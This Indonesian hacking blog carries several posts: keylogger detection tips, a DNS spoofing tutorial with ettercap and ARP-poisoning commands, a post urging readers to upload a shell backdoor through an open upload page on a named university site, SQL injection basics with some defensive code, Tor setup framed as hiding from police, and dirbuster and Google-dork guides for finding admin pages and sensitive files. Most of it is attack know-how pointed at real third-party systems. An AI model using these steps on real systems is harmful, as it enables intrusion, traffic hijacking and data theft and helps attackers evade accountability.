Follow Instagram Kami [=>] www.instagram.com/rinaldi1001101 [=]

Rabu, 20 Agustus 2014

TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt ) di poskan oleh Diaz Rinaldi 14.16 TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt ) Selasa, September 03, 2013 All About Computer, Pengetahuan 1 comment TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt ) Saya akan mencoba mewakili beberapa pertanyaan yang mungkin dialami sebagian pengguna komputer/internet terutama mereka yang paham bahayanya komputer jika sudah mulai dimata-matai seseorang yang tidak bertanggung jawab. Bgaimana Mengetahui Apakah Pada Sebuah Komputer Terpasang Keylogger ? Cara seorang Hacker membobol Password Kita? ? Bagaimana dapat mengetahui suatu komputer telah dipasangi keylogger atau dimata-matai seseorang yang ingin tahu semua isi komputer dan aktifitas kita saat terkoneksi ke internet. Lalu apa bahayanya Kelogger yang terpasang di komputer. Mungkin tidak semua pengguna komputer antipati terhadap serananda virus atau keylogger (alat perekam) pada sebuah komputer miliknya (hal itu bisa terjadi karena umumnya mereka tidak tahu ) lalu apa bahayanya? Bagi anda yang tidak terlalu banyak bertransaksi melalui komputer secara online mungkin tidak terlalu berbahaya, terlebih jika seseorang browsing hanya sekedar baca-baca, download, chatting, facebookan dll, sehinga jika sewaktu-waktu akun facebook kena hack (dirusak) tinggal bikin lagi, mudah kan ? Tapi bagi mereka yang menggunakan komputer, internet, facebook sebagai media berbisnis tentu saja adanya keylogger di komputer sangat berbahaya, karena sekecil apapun yang kita lakukan akan diketahui oleh pemasang keylogger di komputer kita, salah satu contoh email dan pasword kita akan tersadap secara otomatis, mungkin kalau hanya email yang tidak begitu penting tidak jadi masalah bagaimana jika pasword rekening online kita seperti paypai, liberty, alertpay, klik BCA serta akun bisnis online lainnya pindah tananda, secara materi sudah pasti kita rugi. 1. Buka command prompt. Caranya klik start >> pilih all program >> ke accessories >> pilih command prompt 2. Kemudian ketik dir lalu tekan enter (lihat gambar) 3. Setelah selesai akan muncul keluar di command prompt (terlebih duluanda catat angkanya di kertas agar tidak lupa). (Lihat gambar 2) 4. Sekarang Buka program notepad (caranya klik start > all program > assesories > pilih notepad lalu anda mengeketik sembarangan di notepad (agak banyak tapi jangan di save ) Kemudian Ulangi langkah 1 s/d 3 tapi di CMD yang baru jgn di CMD bekas tadi soal'a klw yg tadi angka'a pasti beda, (ketik dir ) jika anda melihat angka itu berubah berarti dikomputer anda ada keylogger, kalau anda merasa tidak menginstal program tertentu atau ada orang lain menginstal keylogger dikomputer anda, bisa jadi berupa program berbahaya jenis lain telah menyerang komputer anda secara online seperti virus, malware, spyware dll dan fungsinya tidak jauh beda dengan keylogger Terima kasih telah membaca postingan saya yg berjudul : TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt ) Rating: 5.0 Description: TIPS Mengetahui Keylogger Melalui CMD ( Command Prompt )

Selasa, 05 Agustus 2014

Wireshark

dan bukan hanya itu kemampuan software ini masih banyak sperti hal nya cracking password yang di transmisikan dengan TCP/IP, dan juga dapat menjadi pendengar di antara dua host yang berbeda dan masih banyak yang bisa di lakukan dengan software ini. Software ini dapat di dowload secara geratis di websitenya http://www.wireshark.org/download.html. 
Dan  situs (website) lain nya juga masih banyak yang ada di internet dari segi namapun wireshark menunjukan kemampuan nya, seperti yang anda lihat di dalam film-film tentang hiu yang cerdas dan pintar, dan melahab semua turis yang berombang ambing di lautan, sepertihal nya seekor hiu yang hidup di sebuah jaringan, dan melahab semua data yang berteparan di jaringan tersebut.

Metasploit

yang sangat serba guna yang tidak bisa di tinggalkan dalam distro-distro linux yang khusus untuk melakukan penetrasi tester untuk membuat atau melihat system mereka sudah layak di public apa belom siap.
Dengan menguasai metasploit dan jaringan komputer saja anda sudah bisa merasakan bagai mana sebenar nya dunia cyber dan IT security , yang bisa anda lakukan dengan menggunakan msf ini adalah :
  •  anda dapat membuat shell sendiri dengan generate
  • anda dapat melihat lalulintas data yang ada
  • scan web vullnerability scanner dengan websploit
  • menembus firewall
  • memalsukan data
  • membuat backdoor dan trojan
  • DdoS sebuah website atau jaringan
  • sniffing
  • DLL yang sangat banyak untuk di sebutkan
 Hampir semua distro linux intuk melakukan penetrasi tester memiliki msf ini , ini adalah distro yang memiliki msf :
  • kali-linux
  • backtrack
  • black box
Msf dibuat oleh perusahan yang berbidang di IT security yang mengumpulkan database-database vullnerability yang ada, dengan system update anda akan selalu mendapatkan yang terbaru dari msf ini.

DNS Spoofing

DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi.

Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker.
Langkah-langkah melakukan DNS spoofing adalah :
download applikasi nya bisa ettercap bisa juga dengan cain&able yang anda bisa dapatkan di internet

ettercap :
  1. OS linux kali linux/windows.
  2. Disi di jelaskan menggunakan kali linux.
  3. Buka terminal dan kettik ettercap –help akan menampilkan perintah-perintah panduan ettercap.
  4. Rubah setting DNS yang ada di ettercap dengan cara ketik “ nano /etc/ettercap/etter.dns” hapus semua nya dan isikan settingan berikut :

    www.yahoo.com                A         [ip-address target]
    www.facebook.com           A         [ip-address target]
    *.com                                  A        [ip-address target]

NB : itu akan merubah koneksi facebook.com dan yahoo.com mengarah ke ip target dan yang terjadi ip terget akan down dan bisa bisa komputer nya over dan reboot sendiri. Ada beberapa fariasi serangan yang di lakukan dengan DNS spofing. Seperti penanaman virus dan phising yang belom di bahas saat ini. Lanjut langkah berikutnya
5.  Masih di jendela terminal dan ketikan “ ettercap -T -q -i [wlan0/interface-anda] -P dns_spoof -M ARP-REMOTE /ip-target/ /getaway/ enter , sebelum melakukan ini anda di haruskan untuk mengaktifkan ip forwarding dengan cara : “ echo 1 > /proc/sys/net/ipv4/ip_forward “ dan enter
selamat membaca semoga bermanfaat.

Melacak server Zeus!!!


Kalian buka browser kalian dan akseslah zeustracker di situ https://zeustracker.abuse.ch/ dan lihat berapa banyak zeus tersebar seperti pada gambar berikut


Di lihat di atas terdapat beberapa server zeus di dalam indonesia ! Apakah ini ulah hacker-hacker indonesia sendiri untuk mencuri data dan file di dalam server menggunakan zeus untuk mengirimkan file-file curian atau yang lebih parah lagi jika hacker dari negara lain yang menjadikan target indonesia sebagai korban zeus yang selanjutnya

Coba kalian akses salah satu yang tertera di dalam map dengn simbol merah dan lihat informasi yang keluar seperti pada contoh yang di pilih negara indonesia sendiri


Klick di bagian IP address yang tertera dalam informasi tadi untuk melihat lebih jelas informasi dari zeus server yang berada di dalam indonesia, setelah kalian mengakses IP address yang tertera di dalam map maka akan keluar informasi seperti berikut


Lebih jelas lagi coba kalian klick website yang sebagai domain untuk server zeus di dalam informasi yang ada, maka akan keluar inforasi seperti ini


coba akses lebih lanjut lagi dengan mengunjungi link yang ada seperti http://syakhroni.blog.unissula.ac.id/admin/file.php akan mengizinkan kalian untuk mengupload file yang ada di dalam pc kalian, kalian bisa saja merebut dengan upload file shell backdoor yang ada dan kalian bisa mengakses database server website tersebut

Coba kalian check dengan menggunakan nmap service yang berada di dalam server tersebut banyak sekali dan menunjukan bahwa zeus menggunakan database mysql sebagai database server seperti pada contoh berikut


semoga bermanfaat dan menambah wawasan pembaca :)

Mengenal SQL Injection

mengeksploitasi database pada suatu websites dengan memaksa keluarnya error page situs itu yang ada error pages itu terdapat info tentang struktur database website yang dieksploitasi. SQL sendiri merupakan bahasa pemrograman database yang sering dipakai para web developer maupun admin sebuah situs untuk menampung ataupun menaruh data-data baru dari suatu input yang masuk seperti input member login, search engine, dan lain sebagainya. 
Sebenarnya SQL injection sendiri bukanlah hal baru, dari dulu teknik ini sudah dikenal dalam dunia hacking sebagai salah satu teknik web hacking, namun baru muncul lagi sekarang karena sifatnya yang dapat merusak database dari suatu situs. Teknik yang digunakan dalam SQL Injection adalah dengan jalan menginput perintah- perintah standar dalam SQL (DDL, DML, DCL) seperti CREATE, INSERT, UPDATE, DROP, ALTER, UNION, SELECT dan perintah-perintah lainnya yang tak asing lagi bagi anda yang sudah mengenal SQL secara mendalam maupun yang baru saja belajar. Dari berbagai jenis SQL dari MySQL, PostgreSQL, Nuke SQL, dan MS-SQL, yang paling rentan terhadap SQL Injection adalah MS-SQL.
SQL Injection adalah suatu teknik injeksi kode yan
g mengeksploitasi kerentanan keamanan yang terjadi pada lapisan database. Kelemahan ini muncul ketika pengguna lolos menembus keamanan dari database tersebut. Contohnya, pembobolan lewat input box dan memasukkannya lewat alamat URL. Selain itu  Teknik hacking SQL injection mulai mencuat kepermukaan semenjak dijebolnya situs KPU pada pemilu 2009 putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan portport yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tools ke situs tersebut yang konon systemnya seharga 152 milyar itu dengan keamanannya yang berlapis lapis.
Pengertian SQL Injection
  1. SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
  2. SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Sebab terjadinya SQL Injection
  1. Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus — yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
  2. Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
  1. Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
  2. Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
  3. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Cara mengatasi/melindungi database dari SQL Injection


1. Lindungi Query SQL
Untuk melindungi query SQL, kita harus menerapkan tehnik sanitasi/mengosongkan seluruh input yang diterima dari request object ASP seperti: Request, Request.QueryString, Request.Form, Request.Cookies dan Request.ServerVariabbles. Teknik sanitasi ini sangat tergantung pada Relational Database Management System.  RDBMS merupakan sistem yang multiuser. Oleh karena itu, RDBMS menyertakan fitur sekuriti untuk mengontrol akses ke/dan penggunaan database. Tujuan arsitektur sekuriti RDBMS adalah untuk melindungi dan memverifikasi semua bagian informasi yang tersimpan dalam database. Informasi bisnis perlu diverifikasi untuk memastikan bahwa tidak ada data yang berubah.
Contoh penanganan MS SQL Server seperti dibawah ini.
Dalam sebuah halaman login, script semestinya terdiri dari dua variabel (txtUserName, txtPassword) dari jenis string yang dilewati. Saat sebuah tanda petik tunggal (‘) dimasukkan dalam sebuah parameter, hal ini mengijinkan user untuk memanipulasi perintah yang dieksekusi. Untuk menghadapi ancaman SQL Injection, hindari penggunaan tanda petik tunggal (‘) dengan menggunakan fungsi REPLACE, seperti dibawah ini:

p_strUsername = Replace(Request.Form(“txtUsername”), “‘”, “””)
p_strPassword = Replace(Request.Form(“txtPassword”), “‘”, “””)

Contoh yang kedua, script diharapkan adalah sebuah variabel (ID) jenis long integer. Perintah SQL yang tidak diotorisasi dapat mengeksekusi dengan menambahkan perintah SQL ke dalam parameter ID. Untuk mengatasi hal ini gunakan input untuk Long Integer dengan fungsi CLng sbb:

p_lngID = CLng(Request(“ID”))

Jika user mencoba melewati suatu string, fungsi CLng akan menampilkan pesan error.

Install tor proxy

berdasarkan alamat IP adress hacker tersebut atau dengan teman dekat nya , jika kalian melakukan aksi hacking di anjurkan menggunakan proxy untuk menjauh dari aksi-aksi orang paling menyebalkan setelah Pebejat (baca aja pejabat) yaitu polkisi (baca aja polisi)

sekarnag mari di bahas tentang bagaimana cara kerja proxy ??? Bagaimana Cara Kerja Proxy?
Proxy bekerja dengan mendengarkan request dari client internal dan mengirim request tersebut ke jaringan eksternal seolah-olah proxy server itu sendiri yang menjadi client. Pada waktu proxy server menerima respon dan server publik, ia memberikan respon tersebut ke client yang asli seolah-olah ia public server.

Proxy dan Keamanan
Internet yang sekarang juga mempunyai cirinya sendiri, dan proxy server menunjukkan efek samping yang sungguh tak terduga: mereka dapat menyembunyikan semua user di belakang satu mesin, mereka dapat memfilter URL, dan mereka dapat membuang content yang mencurigakan atau ilegal. Jadi meskipun mula-mula dibuat sebagai cache nonsekuriti, tujuan utama proxy server sekarang menjadi firewalling.

Proxy server memperbarui request layanan pada jaringan eksternal atas nama client mereka pada jaringan private. Ini secara otomatis menyembunyikan identitas dan jumlah client pada jaringan internal dari jaringan eksternal. Karena posisi mereka di antara client internal dan server publik, proxy juga dapat menyimpan content yang sering diakses dari jaringan publik untuk mengurangi akses ke jaringan publik tersebut. Kebanyakan implementasi nyata proxy sekuriti meliputi pemilteran paket dan Network Address Translation untuk membangun firewall yang utuh. Teknologi tersebut dapat digabungkan dengan proxy untuk menghilangkan serangan yang terhadapnya proxy rentan.

Menyembunyikan Client
Fitur keamanan utama proxy server adalah menyembunyikan client. Seperti Network Address Translation, proxy server dapat membuat seluruh jaringan internal muncul sebagai satu mesin dari Internet karena hanya satu mesin yang melewatkan request ke Internet.
Seperti Network Address Translatation, proxy server mencegah host eksternal untuk mengakses layanan pada mesin internal. Pada proxy server, tidak ada routing ke client karena domain alamat jaringan internal dan eksternal bisa saja tidak kompatibel dan karena transport layer routing tidak ada di antara kedua jaringan.

Proxy melakukan fitur ini dengan memperbarui request, bukan mengganti dan menghitung ulang header alamat. Sebagai contoh, pada waktu client membuat request melalui proxy server, proxy server menerima request tersebut seolah-olah web server tujuan pada jaringan internal. Ia kemudian memperbarui request ke jaringan eksternal seolah web browser biasa. Pada waktu proxy menerima respon dari web server yang sebenarnya, ia memberikan respon tersebut kepada client internalnya. Hanya HTTP yang dilewatkan melalui proxy, bukan TCP atau IP. TCP/IP (dan protokol low-level lainnya) diperbarui oleh proxy; mereka tidak akan dilewatkan melalui proxy.

Aspek lain dari penyembunyian client adalah penyebaran koneksi; proxy server dapat digunakan untuk membagi satu koneksi Internet dan alamat IP ke seluruh jaringan. Oleh karena itu, proxy server seperti WinGate sangat populer di lingkungan rumahan dan kantor kecil di mana hanya ada satu koneksi dial-up atau dedicated yang tersedia.

Pemblokiran URL
Pemblokiran URL memungkinkan administrator untuk menolak situs tertentu berdasarkan URL mereka. Secara teori, ini akan menjauhkan pegawai Anda dari situs web yang tidak boleh mereka akses. Fungsi ini mudah diimplementasikan. Proxy mengecek setiap request dengan daftar halaman yang ditolak sebelum ia memperbarui request tersebut. Jika URL diblokir, proxy tidak akan meminta atau memberikan halaman tersebut.

Namun, pemblokiran URL mudah diatasi, karena situs web bisa ditulis dengan menggunakan alamat IP atau bahkan keseluruhan nomor alamat. User dapat mengetik apa saja dalam web browser mereka untuk mengakses halaman yang sama, namun URL blocker Anda (mungkin) hanya akan mengecek alamat lengkap URL.

Masalah lain dengan pemblokiran URL adalah memperbarui situs yang diblokir. Situs seperti hacking, pornografi, dan situs game mempunyai masa hidup yang singkat, mereka dapat muncul dan hilang dengan cepat. Sulit rasanya untuk memblokir mereka dengan database pemblokiran URL Anda. Kebanyakan orang akan menggunakan search engine atau berita Usenet untuk mengetahui keberadaan situs.

Pemilteran Content
Karena proxy memperbarui semua muatan protokol dan protokol spesifik, proxy dapat digunakan untuk mencari muatan content yang mencurigakan. Ini berarti Anda dapat mengonfigurasi layanan proxy HTTP untuk mempreteli kontrol ActiveX, applet Java, atau bahkan gambar berukuran besar jika Anda rasa mereka bisa menyebabkan masalah keamanan. Anda juga bisa menggunakan proxy SMTP utuk mempreteli attachment berupa file executable dan file arsip zip jika Anda rasa mereka menyebabkan masalah.

Pemfilteran content juga dapat digunakan untuk mengecek halaman web akan adanya kata atau kalimat tertentu, seperti merk dagang kompetitor Anda atau sejumlah berita hangat. Anda harus memfilter control ActiveX, applet Java, dan file executable dalam e-mail karena mereka dapat digunakan untuk menginstalasi Trojan horse.

Jika ada user yang perlu mentransfer file executable, minta mereka untuk mentransfernya dalam file zip atau gunakan BinHex atau encoder yang lain untuk mentransfernya dalam format teks. File akan perlu di-decode, sehingga mencegah pentransferan virus atau Trojan horse.

Pengecekan Konsistensi
Pengecekan konsistensi merupakan pengecekan content protokol untuk memastikan itu dapat dimengerti oleh protokol. Pengecekan konsistensi memastikan bahwa jenis content tertentu tidak dapat digunakan untuk mengeksploitasi kelemahan sistem keamanan dalam jaringan internal Anda

Sebagai contoh, daemon SMTP Sendmail Unix dulunya terkenal peka terhadap masalah buffer overflow. Ini terjadi pada waktu e-mail dikirim dan membutuhkan waktu lebih lama dari yang ditentukan. Sendmail akan mengalokasikan bagian memory sebesar yang diminta oleh e-mail tersebut, tetapi kemudian memeriksa e-mail sampai akhirnya tiba di bagian akhir. Jika di antara bagian yang diminta dan bagian akhir berisi kode executable, hacker bisa mendapatkan akses root ke e-mail server Anda.

Anda tentu pernah mendengar tentang banyaknya jumlah eksploitasi buffer overflow yang dilakukan oleh hacker untuk melawan IIS. Dengan menggunakan URL yang lebih panjang dari yang bisa ditangani IIS dan eksploitasi terhadap DLL pendukung, hacker dapat membuat serangan otomatis terhadap IIS yang bekerja sebagai worm pada Internet dan menyebabkan kerusakan secara luas. Microsoft telah meluncurkan perbaikan keamanan untuk mengatasi masalah ini.

Pengecekan konsistensi dengan proxy dapat memastikan bahwa masalah semacam ini bisa dihilangkan pada proxy sehingga mereka tidak akan mempengaruhi mesin internal. Sayangnya, masalah yang harus dicek biasanya tidak diketahui sampai hacker mengeksploitasi mereka, jadi kebanyakan pengecekan konsistensi hanya dilakukan setelah ditemukan adanya eksploitasi.

Pemblokiran Routing
Paket Transport layer perlu diarahkan karena request semuanya diperbarui. Hal ini menghilangkan eksploitasi Transport layer seperti routing, fragmentasi, dan beragam serangan denialof-service. Dengan menghilangkan routing, Anda juga dapat memastikan bahwa semua protokol yang belum Anda tentukan tidak akan dilewatkan ke jaringan publik. Pemblokiran routing mungkin merupakan keuntungan proxy server yang paling penting. Karena paket TCP/IP sebenarnya lewat antara jaringan internal dan eksternal, banyak serangan denial-of-service dan eksploitasi yang dapat dicegah.

Sayangnya, pemblokiran routing tidak begitu sering digunakan karena banyaknya protokol yang ada. Sedapat mungkin jangan perbolehkan paket low-level melewati proxy server kita. Kebanyakan proxy server memperbolehkan Anda untuk membuat proxy TCP generik untuk semua port yang enggunakan proxy SOCKS generik atau utiiliti redir Unix. Proxy generik ini, meskipun mereka tidak dapat melakukan pemfilteran content, tetapi memungkinkan Anda untuk mencegah paket TCP/IP berlalu-lalang antarjaringan Anda.

Logging dan Alerting
Manfaat keamanan terakhir dari proxy adalah fasilitas logging dan alerting yang mereka sediakan. Proxy memastikan bahwa semua content mengalir melalui satu poin, yang bisa
menjadi tempat pemeriksaan data jaringan. Kebanyakan proxy server akan mencatat penggunaan proxy oleh user dan dapat dikonfigurasi untuk mencatat situs yang mereka kunjungi. Ini akan memungkinkan Anda untuk mengatur ulang cara browsing user jika Anda curiga akan adanya aktivitas yang ilegal atau tidak semestinya.

Fasilitas alert disediakan oleh beberapa proxy untuk memperingatkan Anda atas serangan yang terjadi, meskipun proxy umumnya bukan sasaran penyerangan. Namun, fasilitas ini bisa digunakan untuk meningkatkan kewaspadaan Anda pada interface eksternal, yang sering kali dicoba untuk dieksplotiasi oleh hacker.

Proxy dan Kinerja
Selain aspek keamanan, proxy server juga dapat memberikan peningkatan kinerja yang penting. Pertama, proxy dapat menyimpan data yang sering direquest untuk meningkatkan kinerja dengan menghilangkan akses berlebih ke jaringan eksternal (yang kecepatannya lebih lambat). Kedua, proxy dapat menyeimbangkan beban service ke sejumlah server internal.

Caching
Seperti yang telah disebutkan di bagian awal artikel ini, proxy mula-mula dikembangkan sebagi peningkat kinerja, bukan sebagai perangkat pengaman. Pada awal Internet, hanya ada ribuan situs web. Mereka kebanyakan bersifat ilmiah dan tidak sering berubah. Karena koneksi ke Internet lambat, proxy dapat digunakan untuk menyimpan sebagian besar Internet secara lokal, sehingga pengguna internal cukup browsing ke proxy lokal. Content tidak berubah dengan sangat cepat, jadi ini masih masuk akal.
Sekarang caching hanya masuk akal jika ada user dalam jumlah besar yang mengakses halaman web yang sama berulang-ulang. Pola penggunaan seperti ini sekarang sudah jarang, jadi segi caching proxy server sudah mulai usang.

Dengan e-commerce yang semakin umum, caching akan kembali menjadi fungsi yang penting karena banyak orang akan melakukan pekerjaan mereka dengan menghadapi beberapa situs yang sering diakses. Sebagai contoh, ambil agen perjalanan yang menggunakan Expedia.com dan Travelocity.com untuk melakukan pekerjaan mereka. Banyak agen akan mengakses dua situs yang sama berulang-ulang, sehingga menyimpan elemen situs utama, gambar, dan applet adalah masuk akal.

Reverse Proxy Load Balancing
Proxy server sekarang ini dapat digunakan untuk melakukan “reverse proxy,” atau menyediakan layanan proxy ke client eksternal untuk server internal. Fungsi ini digunakan untuk menyeimbangkan beban klien ke sejumlah web server. Banyak situs web yang fungsionalitasnya tinggi menggunakan aplikasi kompleks seperti ISAPI, Active Server Pages, Java servlet, atau CGI. Aplikasi ini dijalankan pada server, sehingga mereka sangat mengurangi banyaknya client yang mampu ditangani oleh satu server. Sebagai contoh, Windows 2000 server yang menjalankan IIS yang bisa menangani sampai 100.000 browser untuk halaman HTML standar hanya bisa menangani 5000 browser halaman ASP.

Ini berarti bahwa kebanyakan fungsi e-commerce sebenarnya tidak bisa ditangani oleh satu server, jadi situs tersebut harus dijalankan secara paralel ke sejumlah mesin. Sebagai contoh, http://www.microsoft.com/ dijalankan pada 30 server DNS yang identik. DNS menyediakan skema dasar load-sharing di mana akses ke nama DNS akan mendapatkan salah satu alamat IP, tetapi ini belum benar-benar menyeimbangkan beban.

Sudah jelas bagaimana cara proxy bekerja dan apa saja yang bisa di lakukan mengguanakan proxy , hampir sama seperti firewall kan ! Oke kali ini penulis akan memberikan sebuah Proxy ada baik nya dan ada tidak nya juga yaitu TOR-PROXY ,baik nya dengan menggunakan tor ini kalian akan susah untuk di lacak karna Tor memiliki banyak bahkan ribuan IP untuk penggunanya , dan sangat banyak sekali di gunakan oleh para milliter untuk melakukan tugas nya di dalam install tor proxy ada beberapa hal yang harus di install antaralain adalah :
  1. tor software (apps yang di guanakan untuk koneksi keserver Tor-proxy)
  2. vidalia (network mapping untuk server tor)
  3. NTP server (Network Time Protocol)
  4. addons di mozzilla atau iceweasel “auto proxy”
oke untuk menginstall tor kalian tidak perlu repot karna di repository kali linux sudah di sediakan , anda tinggal membuka terminal dan meminta tor tersebut dengan menginstall nya “apt-get install tor” dan tunggu hingga selesai , tidak ada yang perlu di configurasi lagi jika tidak ada error nya oke , kalau terjadi error coapas error nya di google belajar mandiri (mandi sendiri hahaha) yaps setelah selesai kalian boleh menginstall nettwork mapping tor server yaitu vidalia , fungsi ini untuk melihat lalulintas kalian di tor


pastikan sudah terinstall dengan benar oke , sekarang tahap nya adalah menginstall NTP server , Ntp server digunakan untuk menyamakan waktu yang berada di server tor , karna jika waktu kita menggunakan waktu indonesia maka tor tidak akan terkoneksi dengan benar , karna koneksi tor juga berasal dari Negara-negara di mana server tor tersebut di letakan

langglah berikut nya install addons auto-proxy seperti berikut

→ buka webbroser
→ tools
→ add-ons
→ get add-ons
→ cari auto-proxy yang seperti penulis gunakan



ada beberapa yang perlu di setting di dalam add-ons tersebut , coba perhatikan ujung kanan pada webbroser kalian (iceweasel / mozilla) terdapat add-ons baru kan


coba klick pada add-ons proxy tersebut ada beberapa pilihan yaitu auto metic mode , global mode dan disable proxy itu untuk menyalakan proxy kalian , setelah kalian menginstall tor kali ini kalian akan menggunakanya mari ikuti jejak buku ini oke

→ jalankan service NTPd dengan perintah ini di consoel “/etc/init.d/ntp restart atau ntpd restart”
→ jalankan tor “/etc/init.d/tor restart”
kemudian kalian baru bisa menjalankan vidalia nya ketik di console vidalia”
buka browser kalian jalankan add-ons kalian dengan mode “auto metic proxy” maka add-ons akan menjadi merah tanda berjalan nya proxy kalian ada sedikit yang perlu dirubah di dalam add-ons tersebut yaitu default proxy dan when not maching di rubah mejadi koneksi ke server TOR semua oke
kemududian check IP kalian dengan whatismyip / IP kalan sudah berubah

nah dengan adanya proy ini kalian menjadi lebih susah di temukan karna IP kalian bukan asli dan mengguanakan tor yang mana menggunakan ribuan IP untuk koneksi ke Internet

Mencari directory sensitiv

oleh user biasa (atau pengunjung) akan tetapi masih banyak yang masih bisa di baca dan di manfaatkan sebagai informasi yang di manfaatkan untuk menembus system tersebut , contohnya ketika seseorang menemukan halaman login Cpanel atau Administrator , maka seseorang tersebut akan mencoba untuk membrutforce user dan password hingga masuk halaman administrator , ada juga file download yang bisa di gunakan untuk mengambil atau mencuri data sehingga dapat di manfaatkan untuk membuat kamus password untuk system target yang sudah di tentukan
 
disini akan di bahas mengenai loss directory yang akan di dapatkan dengan menggunakan software DIRBUSTER , apa itu dirbuster ??? dirbuster adalah software yang dapat mencari url yang berisi file atau directory yang dapat di baca oleh user (yang seharusnya tidak boleh di baca oleh user biasa atau yang boleh di baca oleh user biasa) bukan hanya directory , software ini juga dapat mencari file-file sensitif seperti upload.php atau download.php , dan bahkan saya pernah mencoba dan bisa membuka configure.php dan apa hasil nya ! Saya mendapatkan user : root dan passwordnya , memalukan bukan ! Oke langsung saja jika kalian menggunakan kali linux atau backtrack di situ sudah ada , ada dua cara untuk menggunakan dirbuster ini , satu membukanya melalui menu Applications → kali linux → web vulnerabilty → web crawlers → dirbuster
 
cara yang kedua buka menu console , dan ketikan dirbuster dan enter maka akan muncul halaman applikasi dirbuster seperti berikut ini
 
 
 
menu target url di situ kalian memasukan taregt yang akan di gali dari directory atau file yang bisa kalian dapatkan contohnya http://abc.com:80/ , setelah itu pilih kamus brutforce yang sudah di sediakan oleh dirbuster tersebut di folder “/usr/share/dirbuster/wordlist/” dan pilih terserah kalian , lebih baik kalian cari tau terlebih dahulu mengenai werserver yang di gunakan oleh website target apache atau IIS atau yang lainya
 
 
 
oke kemudian hilangkan di bagian extensi file php yang ada di “file extensions” karna itu hanya akan mencari file-file php yang ada
 
 
 
sudah selesai sekarang kalian klick start dan tunggu hasilnya ini tergantung proxy yang kalian gunakan dan koneksi kalian , dan seberapa banyak brutforce yang di gunakan oleh dirbuster sendiri , maka dari itu kalian siapkan satu gelas kopi dan beberapa batang rokok sampoerna :D hahaha justkid :D monggo di coba semoga bermanfaat sampai jumpa kembali

Google hacking

 
Mau tau apa yang di gunakan oleh hacker tersebut untuk menembus system dan mendapatkan 200 website dengan waktu yang sangtat singkat ? Hacker tersebut hanya bermodalkan GOOGLE ! What s hacker tersebut hanya menggunakan google untuk menembus 200 server tersebut ?! ya benar hacker tersebut menggunakan GOOGLE
 
Selama ini GOOGLE yang kalian kenal sebagai mesin pembantu dan mesin pencari solusi dari berbagai masalah teknis maupun non teknis yang kalian hadapi , tapi di sisi lain google sangatlah berbahaya karena GOOGLE memiliki dua sudut , kalau istilah nya pedang bercabang 2 jadi google memiliki dua pemeranan tergantung yang menggunakanya , jika yang menggunakanya baek maka google bisa menjadi malaikat yang dapat menyelesaikan masalah dengan singkat atau menemukan masalah yang kita alami seolah dia adalah malaikat
 
Akan tetapi jika jatuh di tangan kalian (bercanda broo …. :P) google bisa melebihi ganas nya buaya yang lapar dan lama menunggu sapi atau hewan yang berenang , setelah hewan tersebut berenang mampuslah hewan tersebut , akan tetapi di sini google melebihi dari buaya tersebut ! karena google bisa memangsa ratusa server sedangkan buaya hanya satu hewan saja hahaha …
 
Yang bisa kalian lakukan dengan google banyak kan , akan tetapi cuma beberapa hal saja dan hanya sekedar contoh bagaimana sih google dapat melakuka nya dan caranya pastinya bagaimana ? Oke kita bahas satu persatu yaa
 
Ada istilah di google adalah google dork , google dork ini adalah dork yang di gunakan untuk seorang hacker mendapatkan system yang mereka inginkan , biasanya hacker lamer dengan hacker elite memiliki beberapa berbedaan , salah satu nya mereka si lamer mencari server dengan dork google hanya untuk mendeface dan menaruhkan nama mereka di dalam server tersebut agar di kenal dan di takuti hahahah …. jika hacker elite menggunakan google dork untuk mengambil server maka server yang di cari dengan google dork akan dijadikan zombie untuk melakukan serangan yang lebih berbahaya lagi contoh google dork banyak sekali kalian cari di google juga pasti pada bermunculan hahah :D ni contoh nya :
 
Mencari sebagian dari URL
 
di mesin pencari terbesar seluruh jagat raya ini google dapat menemukan bagian-bagian dari URL sebuah website dengan mudah dan sangat cepat , mengapa harus bagian dari pada URL kenapa tidak yang lain ? Karna url adalah alamat yang kadang tidak boleh di kunjungi oleh user biasa , seperti saat kalian mencari url yang di dalamnya terdapat file “admin.php/” tidak akan muncul jika kalian menuliskan di google “admin.php” yang ada yang muncul tutorial-tutorial yang bekaitan dengan kata-kata admin dan kata-kata PHP
 
Disini akan di coba mencari bagian dari url sebiah website , perintah yang di gunkan adalalh inurl dan allinurl , printah tadi sangat berbeda jika kalian menggunakan perintah “inurl:/index.php?id=”
tanpa tanda kutip pastinya , kalian akan menemukan beberapa website yang menggunakan url inurl:/index.php?id= denagn catatan bisa jadi idnya ada di bagian belakang dan index tidak sama dengan perintah yang kalian inginkan , dan jika klian menggunakan perintah “allinurl:.index.php?id=user” yang akan muncul website-website yang memilki url tersebut , satu contoh lagi ketika kalian ingin mencari tempat untuk mengupload foto maka perintah yang kalian input di google sebagai berikut “inurl:/upload.php” maka lihat ribuan website muncul dengan url upload.php
 
[Mencari file]
 
